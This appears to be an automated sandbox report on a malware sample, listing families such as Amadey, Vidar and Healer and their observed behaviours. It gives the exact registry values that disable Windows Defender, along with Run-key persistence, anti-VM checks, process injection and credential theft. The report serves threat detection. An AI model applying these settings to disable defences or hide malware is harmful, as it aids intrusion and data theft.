Analysis Overview
SHA256
f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5
Threat Level: Known bad
The file f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5 was found to be: Known bad.
Malicious Activity Summary
SystemBC
Modifies Windows Defender notification settings
Vidar
Healer
Modifies Windows Defender Real-time Protection settings
Modifies Windows Defender DisableAntiSpyware settings
Detects Healer an antivirus disabler dropper
Amadey
Gcleaner family
GCleaner
Modifies Windows Defender TamperProtection settings
Vidar family
Healer family
Detect Vidar Stealer
Amadey family
Systembc family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Uses browser remote debugging
Downloads MZ/PE file
Windows security modification
Reads user/profile data of web browsers
Checks BIOS information in registry
Reads data files stored by FTP clients
Loads dropped DLL
Executes dropped EXE
Reads user/profile data of local email clients
Identifies Wine through registry keys
Checks computer location settings
Unsecured Credentials: Credentials In Files
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
Adds Run key to start application
AutoIT Executable
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Windows directory
Unsigned PE
Program crash
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Enumerates system info in registry
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Delays execution with timeout.exe
Suspicious use of WriteProcessMemory
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Modifies data under HKEY_USERS
Checks processor information in registry
Modifies system certificate store
Modifies Internet Explorer settings
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-02-24 13:38
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-02-24 13:38
Reported
2025-02-24 13:41
Platform
win7-20240903-en
Max time kernel
149s
Max time network
149s
Command Line
Signatures
Amadey
Amadey family
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Healer an antivirus disabler dropper
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
GCleaner
Gcleaner family
Healer
Healer family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE | N/A |
Modifies Windows Defender TamperProtection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE | N/A |
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications | C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE | N/A |
SystemBC
Systembc family
Vidar
Vidar family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\rwhkbvh\apitlt.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| N/A | N/A | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| N/A | N/A | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\rwhkbvh\apitlt.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\rwhkbvh\apitlt.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\ProgramData\rwhkbvh\apitlt.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091694021\\am_no.cmd" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\dbf56223ab.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091693101\\dbf56223ab.exe" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
Checks installed software on the system
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1740 set thread context of 2820 | N/A | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe |
| PID 2880 set thread context of 2264 | N/A | C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 2652 set thread context of 1548 | N/A | C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 2468 set thread context of 2000 | N/A | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\skotes.job | C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091747001\ff28c3aaec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\rwhkbvh\apitlt.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091749001\2f4444c5a8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
